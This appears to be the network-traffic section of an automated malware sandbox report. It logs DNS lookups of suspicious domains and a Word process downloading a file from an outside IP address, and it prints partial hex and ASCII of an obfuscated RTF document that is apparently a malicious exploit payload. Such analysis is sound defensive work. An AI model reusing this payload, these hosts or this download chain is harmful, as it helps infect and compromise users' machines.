                                              Jun 13, 2023 11:02:39.708138943 CEST4919780192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.708138943 CEST4919780192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.708161116 CEST4919780192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.708161116 CEST4919780192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.708324909 CEST4919780192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.708327055 CEST4919880192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.720276117 CEST8049197104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:02:39.724375963 CEST8049198104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:02:39.724420071 CEST8049198104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:02:39.724567890 CEST4919880192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.728363991 CEST8049198104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:02:39.728425980 CEST8049198104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:02:39.728460073 CEST8049198104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:02:39.728491068 CEST8049198104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:02:39.728522062 CEST8049198104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:02:39.728544950 CEST8049198104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:02:39.728550911 CEST4919880192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.728581905 CEST8049198104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:02:39.728586912 CEST4919880192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.728586912 CEST4919880192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.728609085 CEST4919880192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.728622913 CEST4919880192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.728622913 CEST4919880192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.728640079 CEST4919880192.168.2.22104.17.158.1
                                              Jun 13, 2023 11:02:39.740716934 CEST8049198104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:02:39.741025925 CEST8049198104.17.158.1192.168.2.22
                                              Jun 13, 2023 11:03:01.981522083 CEST4918880192.168.2.2215.223.2.12
                                              Jun 13, 2023 11:03:22.559619904 CEST4919980192.168.2.22188.114.96.3
                                              Jun 13, 2023 11:03:22.575927973 CEST8049199188.114.96.3192.168.2.22
                                              Jun 13, 2023 11:03:22.576148033 CEST4919980192.168.2.22188.114.96.3
                                              Jun 13, 2023 11:03:22.576448917 CEST4919980192.168.2.22188.114.96.3
                                              Jun 13, 2023 11:03:22.592784882 CEST8049199188.114.96.3192.168.2.22
                                              Jun 13, 2023 11:03:22.603111982 CEST8049199188.114.96.3192.168.2.22
                                              Jun 13, 2023 11:03:22.603198051 CEST8049199188.114.96.3192.168.2.22
                                              Jun 13, 2023 11:03:22.603508949 CEST4919980192.168.2.22188.114.96.3
                                              Jun 13, 2023 11:03:22.603569984 CEST4919980192.168.2.22188.114.96.3
                                              Jun 13, 2023 11:03:22.916352034 CEST4919980192.168.2.22188.114.96.3
                                              Jun 13, 2023 11:03:22.932400942 CEST8049199188.114.96.3192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jun 13, 2023 11:01:04.061230898 CEST5013453192.168.2.228.8.8.8
                                              Jun 13, 2023 11:01:04.089646101 CEST53501348.8.8.8192.168.2.22
                                              Jun 13, 2023 11:01:05.942433119 CEST5527553192.168.2.228.8.8.8
                                              Jun 13, 2023 11:01:05.977571964 CEST53552758.8.8.8192.168.2.22
                                              Jun 13, 2023 11:01:05.984250069 CEST5991553192.168.2.228.8.8.8
                                              Jun 13, 2023 11:01:06.013556957 CEST53599158.8.8.8192.168.2.22
                                              Jun 13, 2023 11:01:10.084825993 CEST5440853192.168.2.228.8.8.8
                                              Jun 13, 2023 11:01:10.117676020 CEST53544088.8.8.8192.168.2.22
                                              Jun 13, 2023 11:01:10.120791912 CEST5010853192.168.2.228.8.8.8
                                              Jun 13, 2023 11:01:10.140496969 CEST53501088.8.8.8192.168.2.22
                                              Jun 13, 2023 11:01:11.233300924 CEST5472353192.168.2.228.8.8.8
                                              Jun 13, 2023 11:01:11.253031015 CEST53547238.8.8.8192.168.2.22
                                              Jun 13, 2023 11:01:11.254627943 CEST5806253192.168.2.228.8.8.8
                                              Jun 13, 2023 11:01:11.274291039 CEST53580628.8.8.8192.168.2.22
                                              Jun 13, 2023 11:01:42.192312956 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:01:42.942578077 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:01:43.707201958 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:02:16.681246042 CEST5670353192.168.2.228.8.8.8
                                              Jun 13, 2023 11:02:16.713160992 CEST53567038.8.8.8192.168.2.22
                                              Jun 13, 2023 11:02:23.634526968 CEST138138192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:02:37.448982000 CEST5924153192.168.2.228.8.8.8
                                              Jun 13, 2023 11:02:37.628540039 CEST53592418.8.8.8192.168.2.22
                                              Jun 13, 2023 11:02:57.969990969 CEST5524453192.168.2.228.8.8.8
                                              Jun 13, 2023 11:02:58.984745026 CEST5524453192.168.2.228.8.8.8
                                              Jun 13, 2023 11:02:59.998120070 CEST5524453192.168.2.228.8.8.8
                                              Jun 13, 2023 11:03:02.149504900 CEST5524453192.168.2.228.8.8.8
                                              Jun 13, 2023 11:03:02.993915081 CEST53552448.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:03.275275946 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:03:04.008074999 CEST53552448.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:04.038600922 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:03:04.803093910 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:03:05.021673918 CEST53552448.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:07.173090935 CEST53552448.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:07.657764912 CEST5395853192.168.2.228.8.8.8
                                              Jun 13, 2023 11:03:08.656723976 CEST5395853192.168.2.228.8.8.8
                                              Jun 13, 2023 11:03:09.670907974 CEST5395853192.168.2.228.8.8.8
                                              Jun 13, 2023 11:03:11.683568954 CEST5395853192.168.2.228.8.8.8
                                              Jun 13, 2023 11:03:12.673301935 CEST53539588.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:12.674865007 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:03:13.430665016 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:03:13.672507048 CEST53539588.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:14.195260048 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:03:14.686546087 CEST53539588.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:15.189754009 CEST5602053192.168.2.228.8.8.8
                                              Jun 13, 2023 11:03:16.193205118 CEST5602053192.168.2.228.8.8.8
                                              Jun 13, 2023 11:03:16.699184895 CEST53539588.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:17.206482887 CEST5602053192.168.2.228.8.8.8
                                              Jun 13, 2023 11:03:19.220330000 CEST5602053192.168.2.228.8.8.8
                                              Jun 13, 2023 11:03:20.209244967 CEST53560208.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:20.213335991 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:03:20.966176033 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:03:21.208787918 CEST53560208.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:21.730602980 CEST137137192.168.2.22192.168.2.255
                                              Jun 13, 2023 11:03:22.221929073 CEST53560208.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:22.522051096 CEST5166353192.168.2.228.8.8.8
                                              Jun 13, 2023 11:03:22.557558060 CEST53516638.8.8.8192.168.2.22
                                              Jun 13, 2023 11:03:24.236000061 CEST53560208.8.8.8192.168.2.22

                                              ICMP Packets

                                              TimestampSource IPDest IPChecksumCodeType
                                              Jun 13, 2023 11:03:04.008295059 CEST192.168.2.228.8.8.8d003(Port unreachable)Destination Unreachable
                                              Jun 13, 2023 11:03:05.021894932 CEST192.168.2.228.8.8.8d003(Port unreachable)Destination Unreachable
                                              Jun 13, 2023 11:03:07.173255920 CEST192.168.2.228.8.8.8d003(Port unreachable)Destination Unreachable
                                              Jun 13, 2023 11:03:13.674712896 CEST192.168.2.228.8.8.8d003(Port unreachable)Destination Unreachable
                                              Jun 13, 2023 11:03:14.686691999 CEST192.168.2.228.8.8.8d003(Port unreachable)Destination Unreachable
                                              Jun 13, 2023 11:03:16.699417114 CEST192.168.2.228.8.8.8d003(Port unreachable)Destination Unreachable
                                              Jun 13, 2023 11:03:21.208991051 CEST192.168.2.228.8.8.8d003(Port unreachable)Destination Unreachable
                                              Jun 13, 2023 11:03:22.222451925 CEST192.168.2.228.8.8.8d003(Port unreachable)Destination Unreachable
                                              Jun 13, 2023 11:03:24.236134052 CEST192.168.2.228.8.8.8d003(Port unreachable)Destination Unreachable

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jun 13, 2023 11:01:04.061230898 CEST192.168.2.228.8.8.80x3d10Standard query (0)unesa.meA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:05.942433119 CEST192.168.2.228.8.8.80x5cf1Standard query (0)unesa.meA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:05.984250069 CEST192.168.2.228.8.8.80xb845Standard query (0)unesa.meA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:10.084825993 CEST192.168.2.228.8.8.80xdc64Standard query (0)unesa.meA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:10.120791912 CEST192.168.2.228.8.8.80xbe50Standard query (0)unesa.meA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:11.233300924 CEST192.168.2.228.8.8.80x12f1Standard query (0)unesa.meA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:11.254627943 CEST192.168.2.228.8.8.80xe6e0Standard query (0)unesa.meA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:02:16.681246042 CEST192.168.2.228.8.8.80x550cStandard query (0)www.folado.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:02:37.448982000 CEST192.168.2.228.8.8.80x7074Standard query (0)www.cell-phones-0406-da-sa-fb.xyzA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:02:57.969990969 CEST192.168.2.228.8.8.80x22d2Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:02:58.984745026 CEST192.168.2.228.8.8.80x22d2Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:02:59.998120070 CEST192.168.2.228.8.8.80x22d2Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:02.149504900 CEST192.168.2.228.8.8.80x22d2Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:07.657764912 CEST192.168.2.228.8.8.80x801Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:08.656723976 CEST192.168.2.228.8.8.80x801Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:09.670907974 CEST192.168.2.228.8.8.80x801Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:11.683568954 CEST192.168.2.228.8.8.80x801Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:15.189754009 CEST192.168.2.228.8.8.80x9304Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:16.193205118 CEST192.168.2.228.8.8.80x9304Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:17.206482887 CEST192.168.2.228.8.8.80x9304Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:19.220330000 CEST192.168.2.228.8.8.80x9304Standard query (0)www.dyj97.comA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:22.522051096 CEST192.168.2.228.8.8.80xe261Standard query (0)www.orbit4dads.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jun 13, 2023 11:01:04.089646101 CEST8.8.8.8192.168.2.220x3d10No error (0)unesa.me103.242.124.88A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:05.977571964 CEST8.8.8.8192.168.2.220x5cf1No error (0)unesa.me103.242.124.88A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:06.013556957 CEST8.8.8.8192.168.2.220xb845No error (0)unesa.me103.242.124.88A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:10.117676020 CEST8.8.8.8192.168.2.220xdc64No error (0)unesa.me103.242.124.88A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:10.140496969 CEST8.8.8.8192.168.2.220xbe50No error (0)unesa.me103.242.124.88A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:11.253031015 CEST8.8.8.8192.168.2.220x12f1No error (0)unesa.me103.242.124.88A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:01:11.274291039 CEST8.8.8.8192.168.2.220xe6e0No error (0)unesa.me103.242.124.88A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:02:16.713160992 CEST8.8.8.8192.168.2.220x550cNo error (0)www.folado.com13.248.169.48A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:02:16.713160992 CEST8.8.8.8192.168.2.220x550cNo error (0)www.folado.com76.223.54.146A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:02:37.628540039 CEST8.8.8.8192.168.2.220x7074No error (0)www.cell-phones-0406-da-sa-fb.xyzssl1.prod.systemdragon.comCNAME (Canonical name)IN (0x0001)false
                                              Jun 13, 2023 11:02:37.628540039 CEST8.8.8.8192.168.2.220x7074No error (0)ssl1.prod.systemdragon.com104.17.158.1A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:02:37.628540039 CEST8.8.8.8192.168.2.220x7074No error (0)ssl1.prod.systemdragon.com104.17.157.1A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:02.993915081 CEST8.8.8.8192.168.2.220x22d2Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:04.008074999 CEST8.8.8.8192.168.2.220x22d2Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:05.021673918 CEST8.8.8.8192.168.2.220x22d2Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:07.173090935 CEST8.8.8.8192.168.2.220x22d2Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:12.673301935 CEST8.8.8.8192.168.2.220x801Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:13.672507048 CEST8.8.8.8192.168.2.220x801Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:14.686546087 CEST8.8.8.8192.168.2.220x801Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:16.699184895 CEST8.8.8.8192.168.2.220x801Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:20.209244967 CEST8.8.8.8192.168.2.220x9304Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:21.208787918 CEST8.8.8.8192.168.2.220x9304Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:22.221929073 CEST8.8.8.8192.168.2.220x9304Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:22.557558060 CEST8.8.8.8192.168.2.220xe261No error (0)www.orbit4dads.com188.114.96.3A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:22.557558060 CEST8.8.8.8192.168.2.220xe261No error (0)www.orbit4dads.com188.114.97.3A (IP address)IN (0x0001)false
                                              Jun 13, 2023 11:03:24.236000061 CEST8.8.8.8192.168.2.220x9304Server failure (2)www.dyj97.comnonenoneA (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • unesa.me
                                              • 15.223.2.12
                                              • www.folado.com
                                              • www.cell-phones-0406-da-sa-fb.xyz
                                              • www.orbit4dads.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249181103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.2249182103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              10192.168.2.224918815.223.2.1280C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
                                              Jun 13, 2023 11:01:15.629559040 CEST65OUTGET /we/wewewewewewewewew%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23ewewewewewewe.doc HTTP/1.1
                                              Accept: */*
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              Connection: Keep-Alive
                                              Host: 15.223.2.12
                                              Jun 13, 2023 11:01:15.735491991 CEST66INHTTP/1.1 200 OK
                                              Date: Tue, 13 Jun 2023 09:01:15 GMT
                                              Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
                                              Last-Modified: Tue, 13 Jun 2023 01:06:09 GMT
                                              ETag: "5ce4-5fdf870cbe527"
                                              Accept-Ranges: bytes
                                              Content-Length: 23780
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/msword
                                              Data Raw: 7b 5c 72 74 66 31 0d 09 09 09 09 09 09 7b 5c 2a 5c 61 75 6c 64 34 36 31 33 34 37 38 37 33 20 5c 2e 7d 0d 7b 5c 34 31 31 31 32 30 35 38 39 2e 37 5d b0 40 3f 3e 5d 3d 31 32 5f 40 2b 2b 3b 21 60 24 25 2e 24 36 3f 3c 5e 3c 3f b5 5f 60 3b 3f 32 27 2e b5 26 26 39 3a a7 2e 2c 38 26 25 a7 3f 2a 2e 3f 3f 3f 7e 3f 5d 30 25 3f 3f 31 3f b5 3c a7 2f 34 25 2b 60 3b 25 27 2c 28 3f 3f 35 3f 26 2a 39 60 5f 2d 3d 5d 7e 5e 2d 7c 32 25 2b 5b 60 5b 25 30 b0 7c 3d 2a 5b 7e 3d 29 3f 2d 3e 2e 27 24 3d 39 36 5e 37 25 2f 25 32 2b 39 2e 31 31 3d 32 b5 3f 36 3f a7 2c a7 b5 27 5b 27 31 b0 2d 2b 3f 3f 7e 36 3b 5b 40 b5 3f 3f 34 27 60 3f 2f 40 3d 26 3f 3f 7c b5 3e 25 3f 2f 3b 3f 31 5e 2b 2d 2b 26 5f 3f 29 28 3e b5 3f 28 3f 3e 34 33 5e 5b b0 2f 28 30 3d b0 32 38 3f 60 35 3f 32 33 3f 3e 33 2e 36 3a 3f 5d 37 7c 2d 5d 38 38 23 5f 3b 5f a7 25 5e 60 31 24 3f 3e 2f a7 33 27 25 7e 5e 2b 3f 5e 3f 2d 24 3f 2f 28 29 5f 7e 5e 30 3f b5 3d 28 2b 29 26 29 3e 2c 3c 3c b0 24 24 21 25 7e 5d 32 26 25 a7 7c 3e 3d 28 23 40 3b 33 25 2e 3f 3f 2a 33 23 3f 3f 3a 3f 3f 37 40 29 25 7c 2c 2b 29 60 3b 3f 60 3a 32 24 40 2a 28 7c 40 35 3c 3f 2e 28 2d 2e 7c 2a 2b 3c 2e 2c 2a 38 3f 25 7e 5e 39 3f 3f 5e 5f 3c 3b 34 2f 3f b5 b5 3b 3b 25 2b 3f 38 b0 25 29 37 3f 23 5f 31 3f 3f 33 21 5f 5e 3f 21 2a 26 3f 32 3f 23 40 3f 3f 26 7e 7c 3f 40 23 38 35 39 38 60 40 5b a7 32 7c 3b 3c 3e 7c b5 40 24 35 2c 3d 2b 27 60 b5 35 31 5b 29 3f 39 31 31 5b 5f 28 30 26 2e 37 25 60 37 35 29 28 24 21 2c 3a 27 2d 5f 60 3f 25 3c 33 25 21 40 35 5e 3b 25 3f 28 30 3f 36 32 b5 3f 7c 3f 3c 35 2f 3e 3f 23 34 2a 32 27 3a 3f 60 2a 3f 2f 7e 3c 31 3f 5f 3e 25 39 34 32 23 37 35 2d 25 32 23 3c 28 3f 2c 23 2f 3d 26 60 2a 3f 38 3a 34 33 3f 2e 28 34 33 5d 2d 3b 26 2d 25 5b 3f 3d 3f 5d 5d 31 b5 3f 25 2f 2a 3f 3e 5f 2a 60 b5 3c 3b 2f 35 5f a7 3f 33 2f 3f 36 2a 2c 40 33 3f 2a 33 3f 28 33 36 7c 21 28 5d 35 34 5e 37 3f a7 30 3d b5 30 7c 34 7c 2b a7 29 3d 33 3c 25 b0 3c 5f 5e 5b 2d 21 b0 5e 7e 27 3f 5f 3b 28 b0 35 5b 3f 25 30 7e 3f 33 2e b0 3f 3d 2a 5f 29 28 23 28 3d 7e 32 7e b5 25 23 2c 60 35 36 27 2a 5f 40 34 3f 31 35 b0 30 2e 5e 2a 33 2e 3a 23 2e 23 3f 29 3f 2c 3b b0 7c 5b 2d 39 38 2e 2e 24 2d 3d 38 3f 2f 5f 3b 3f 5f a7 3b 7e 3d 35 a7 33 7c b0 2d 5b 24 2b 60 3a 5d b5 31 2d 2c 26 7c 3f b0 3e 26 34 34 2e 5b 3e 7e 31 36 31 29 a7 3f 3e 36 3c 7c 31 2b 40 34 3f 2a 40 30 32 26 25 7e 30 21 37 35 60 3d b0 2f 40 2c 3f b0 3f 2b a7 38 3a 3f 37 7e 38 b5 23 3f 3b 31 5f 34 3e 23 31 3e 25 35 25 25 36 26 36 29 60 60 35 5d 21 7c 25 38 33 b5 37 3a 39 5d 26 21 60 b0 27 2a 37 2a b5 2c 3e 2b 27 37 2d 3f 30 25 3a 29 2b 7c a7 a7 38 26 34 5d 60 2c 7c 7e 2a 40 3a 33 38 a7 2e 29 39 40 5d 2e 38 5e 2e 3f 7e b0 39 2b 3c 7e 2e 25 5b 3a 3c 35 3f b5 3b 33 34 36 2d 30 b0 5d 2f 5e a7 32 b5 35 25 3f 34 a7 29 25 38 3b 3f 3e 3b 2e 3f 21 33 a7 3d 7c 3f 3f 3f a7 24 39 3a 2a 7c 2a 3b 30 3d 37 2d 35 b5 24 2b 25 5d 26 25 a7 b0 3d 5d 3b 5b b0 5f 3f 34 25 3a 32 34 26 3f 37 35 31 39 2b 2e 2b 7e 27
                                              Data Ascii: {\rtf1{\*\auld461347873 \.}{\411120589.7]@?>]=12_@++;!`$%.$6?<^<?_`;?2'.&&9:.,8&%?*.???~?]0%??1?</4%+`;%',(??5?&*9`_-=]~^-|2%+[`[%0|=*[~=)?->.'$=96^7%/%2+9.11=2?6?,'['1-+??~6;[@??4'`?/@=&??|>%?/;?1^+-+&_?)(>?(?>43^[/(0=28?`5?23?>3.6:?]7|-]88#_;_%^`1$?>/3'%~^+?^?-$?/()_~^0?=(+)&)>,<<$$!%~]2&%|>=(#@;3%.??*3#??:??7@)%|,+)`;?`:2$@*(|@5<?.(-.|*+<.,*8?%~^9??^_<;4/?;;%+?8%)7?#_1??3!_^?!*&?2?#@??&~|?@#8598`@[2|;<>|@$5,=+'`51[)?911[_(0&.7%`75)($!,:'-_`?%<3%!@5^;%?(0?62?|?<5/>?#4*2':?`*?/~<1?_>%942#75-%2#<(?,#/=&`*?8:43?.(43]-;&-%[?=?]]1?%/*?>_*`<;/5_?3/?6*,@3?*3?(36|!(]54^7?0=0|4|+)=3<%<_^[-!^~'?_;(5[?%0~?3.?=*_)(#(=~2~%#,`56'*_@4?150.^*3.:#.#?)?,;|[-98..$-=8?/_;?_;~=53|-[$+`:]1-,&|?>&44.[>~161)?>6<|1+@4?*@02&%~0!75`=/@,??+8:?7~8#?;1_4>#1>%5%%6&6)``5]!|%837:9]&!`'*7*,>+'7-?0%:)+|8&4]`,|~*@:38.)9@].8^.?~9+<~.%[:<5?;346-0]/^25%?4)%8;?>;.?!3=|???$9:*|*;0=7-5$+%]&%=];[_?4%:24&?7519+.+~'
                                              Jun 13, 2023 11:01:15.735621929 CEST67INData Raw: 5e 3f 3f 31 2a 32 3f 34 60 b5 3f 24 3d 3e 3b 30 32 3f 26 25 3d 29 26 3f 3c 2d 37 7c 3e 3a 28 32 b0 3d 2e 5f 5d 34 5d 60 2a 3f 3f 23 7c 21 38 25 40 3f 3f 5e 3c 25 26 24 2c 34 5f 60 3d 2b 38 3b 38 38 36 25 7c 60 3e 2a 60 28 33 26 38 2d b5 2b 26 2a
                                              Data Ascii: ^??1*2?4`?$=>;02?&%=)&?<-7|>:(2=._]4]`*??#|!8%@??^<%&$,4_`=+8;886%|`>*`(3&8-+&*8=?$0<_?,<&+<',%+;?#<(40.`~;|~;?|0?&13-68%-<;3&'[`?&&)<8>[.#)<?$-2&43>?`4!6*5_#=?^,)2_'45;=::3]:8?[48%%7+)<]*0~%1![3?5&?|.?^/2[`6??>2!=&|(+:?1|6??#2??2?|*8
                                              Jun 13, 2023 11:01:15.735686064 CEST69INData Raw: 5e 32 3a 60 25 35 28 3e 33 29 24 23 25 b5 3c 3b 3a 36 21 3b b5 3f 7c 3f 30 24 24 23 34 33 60 40 3f 39 29 36 36 3d 34 26 36 38 2b 25 60 b5 3f 3f 2d 27 25 7c 35 b0 a7 b0 37 25 3a 3f 24 3f 32 39 2c 3c 3f 25 25 b5 3f 2d a7 21 2d 32 29 3f 33 30 32 39
                                              Data Ascii: ^2:`%5(>3)$#%<;:6!;?|?0$$#43`@?9)66=4&68+%`??-'%|57%:?$?29,<?%%?-!-2)?3029:~&>?151*//1>`8-4%,'(^[,?)?62>&##_))?293!!;4?4)?/?.<%:#8%$2<<?6=5=',)%^+8.]#7?_`]+?^+]~?;|(9?28~//.(:6:10?4|0)6(?1?#?~):()?.?<[)!#?7~,!:#8-%:7<,_?904@4):
                                              Jun 13, 2023 11:01:15.735749006 CEST70INData Raw: 31 09 09 20 20 20 30 20 09 20 20 20 30 20 09 20 20 20 30 0d 30 30 20 09 20 20 20 30 30 0d 30 30 20 09 20 20 20 30 09 20 20 20 20 30 0a 30 30 30 30 30 0a 30 30 30 30 09 20 09 20 20 30 0a 30 30 20 09 09 20 20 30 0a 30 0a 30 30 30 0a 30 0a 30 30 30
                                              Data Ascii: 1 0 0 000 0000 0 0000000000 000 000000000 3e 0 00300fef f0900 06000000000000000000 000001000000010 0 0 0000 00000000010 000002 000000 0
                                              Jun 13, 2023 11:01:15.735810995 CEST71INData Raw: 66 09 20 09 09 09 66 0a 66 66 66 66 66 66 20 20 09 09 09 66 66 09 20 20 09 09 66 66 66 0a 66 09 20 20 09 09 66 66 66 66 0a 66 66 66 66 66 20 20 09 20 09 66 20 09 20 09 09 66 20 09 20 09 09 66 66 0a 66 66 09 09 20 09 09 66 66 66 66 66 66 66 20 20
                                              Data Ascii: f fffffff ff ffff fffffffff f f ffff fffffff fff fff ff ff fff fffffff fff ff ffffffffffffffff ffff fffffffff ff f ffff f f f
                                              Jun 13, 2023 11:01:15.735869884 CEST73INData Raw: 30 36 30 30 09 09 09 20 20 30 30 30 0d 30 66 0a 65 66 66 09 20 20 20 20 66 66 09 20 09 09 20 66 66 66 0a 66 66 66 66 20 20 20 20 09 66 66 66 66 66 66 66 0a 66 20 09 20 20 09 66 66 66 66 09 09 20 20 09 66 09 20 09 09 09 66 09 09 20 09 09 66 66 0a
                                              Data Ascii: 0600 0000feff ff fffffff ffffffff ffff f f fffffff f ffff ffffffff ffff ffffff fffff fffff ff ffffff ff fffffffff fff f fff fffff
                                              Jun 13, 2023 11:01:15.735929012 CEST74INData Raw: 66 20 09 09 20 20 66 09 09 09 20 20 66 09 09 09 20 20 66 0d 66 09 09 09 20 20 66 66 09 09 09 20 20 66 0d 66 0d 66 66 66 09 09 09 20 20 66 66 0d 66 20 09 09 20 20 66 20 20 09 20 20 66 20 20 09 20 20 66 20 20 09 20 20 66 66 09 09 09 20 20 66 20 09
                                              Data Ascii: f f f ff ff fffff fff f f f ff f ffffff ffff fffffff ffffff fffff fff ff ff ffffffffffffff fff fff ff ffff ffff f f
